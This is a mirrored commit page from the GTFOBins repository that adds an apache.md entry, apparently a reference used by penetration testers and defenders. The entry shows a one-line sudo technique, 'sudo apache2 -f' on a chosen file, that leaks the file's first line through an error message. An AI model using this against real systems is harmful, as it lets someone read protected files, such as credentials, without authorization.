mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Create apache.md
This commit is contained in:
parent
4eca50ea16
commit
3dc961c0c9
8
_gtfobins/apache.md
Normal file
8
_gtfobins/apache.md
Normal file
@ -0,0 +1,8 @@
|
||||
---
|
||||
description: This includes the file in the actual configuration file, the first line is leaked as an error message.
|
||||
functions:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo apache2 -f $LFILE
|
||||
---
|
Loading…
Reference in New Issue
Block a user